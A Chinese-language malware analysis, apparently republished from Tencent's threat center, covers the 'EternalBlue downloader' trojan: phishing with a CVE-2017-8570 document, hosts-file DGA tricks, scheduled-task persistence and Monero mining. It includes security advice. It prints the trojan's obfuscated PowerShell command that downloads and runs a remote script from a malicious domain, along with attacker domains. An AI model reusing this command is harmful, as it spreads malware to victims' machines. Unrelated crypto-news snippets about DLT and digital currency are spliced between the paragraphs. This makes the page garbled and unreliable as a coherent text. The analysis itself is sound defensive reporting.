DLT:“永恒之蓝下载器木马”新增钓鱼邮件传播，利用用户机器挖矿门罗币_数字货币的五个特点

来源：腾讯御见威胁情报中心

编者注：原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播，附件含CVE-2017-8570漏洞攻击代码》

“永恒之蓝”下载器木马在感染用户机器上运行后，会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档，该文档附带CVE-2017-8570漏洞攻击代码。

如果被攻击用户收到邮件并不慎打开文档，就可能触发漏洞执行Powershell命令下载mail.jsp：

证监会姚前：利用区块链技术与分布式文件系统技术，将底层技术的全量信息同步上链:证监会科技监管局局长姚前表示，中小企业数字化转型的一个发力点是数字资产和数字金融，我国中小企业融资难、融资贵问题由来已久。一个行之有效的解决方案是，利用互联网技术，尤其是区块链技术与分布式文件系统技术，将底层技术的全量信息同步上链。平台上的数据安全、数据隐私保护、数据跨境流动等也成为监管部门的监管重点。（新京报）[2020/12/16 15:22:30]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

声音 | 姚前：基于DLT的新一代金融市场基础设施潜力无限:中国证券登记结算有限责任公司总经理、央行数字货币研究所前所长姚前于《中国金融》2019年第23期刊文称：基于分布式账本技术（DLT）的新一代金融市场基础设施（Financial Market Infrastructures，FMI）可以使金融服务变得更加开放、更有活力、更有韧性，同时也使金融监管更加精准。 在数字化技术的手段下，基于DLT的FMI不仅可行而且可控，监管也可以做到更加精准。因此，它是规范的。DLT账本不易伪造，难以篡改，且可追溯，容易审计，所以它又是透明的。同时它打开了传统分布式系统的围墙，使金融服务变得更加自由开放，更有活力，而且它还基于可信技术，容错性强，更有韧性。 综上所述，基于DLT的新型FMI是符合“规范、透明、开放、有活力、有韧性”五大标准的金融市场基础设施，潜力无限，前景可期。[2019/11/27]

而下载使用的域名ap35nf7.jp实际上并没有注册，但是依然能够解析到地址：t.awcna.com，是因为被感染机器的本地hosts文件被篡改，使得随机生成的域名映射到木马使用的恶意地址，细节请参考御见威胁情报中心此前发布的报告：《“永恒之蓝下载器”木马篡改hosts指向随机域名，再用多个漏洞攻击内网挖矿》。

声音 | 姚前：央行数字货币未来还需要研究量子货币:据《比较》第98辑消息，姚前表示，展望未来，央行数字货币还需要研究量子货币。量子货币可以解决经典数字货币最头痛的双花问题。理想的量子货币相当于同时结合了传统货币（纸币）和经典数字货币的优点，并避免了它们各自在本质上难以克服的缺点。当前，可部分应用量子技术为数字货币的设计和实现提供服务。[2018/11/23]

本次攻击过程中，木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp经过高度混淆，多次解密后可以看到其安装多个计划任务下载Powershell脚本执行，并使用了新的计划任务名：

“Bluetea“蓝茶。

“永恒之蓝”下载器木马自出现之后从未停止更新，从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀，并且通过安装多个类型的计划任务进行持久化。在传播方式上，最初通过供应链攻击积累一批感染机器后，又不断利用”永恒之蓝”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法进行扩散传播，近期又增加了DGA域名攻击和钓鱼邮件攻击，其最终目的只为利用用户机器挖矿门罗币获利。

永恒之蓝下载器木马的历次版本更新参考下表：

安全建议

1.建议用户不要轻易打开不明来源的邮件附件，对于邮件附件中的文件要格外谨慎运行，如发现有脚本或其他可执行文件可先使用杀软件进行扫描；

2.服务器使用安全的密码策略，特别是IPC$、MSSQL、RDP账号密码，切勿使用弱口令，避免遭遇弱密码爆破攻击；

3.根据微软安全公告及时修复Office漏洞CVE-2017-8570，需进行漏洞扫描和修复，或采用WindowsUpdate进行。

IOCs

http//t.awcna.com/mail.jsp

标签：数字货币DLTCOMSHEL数字货币的五个特点DLT价格SheBollETH CommerceshelterDAO

OKB热门资讯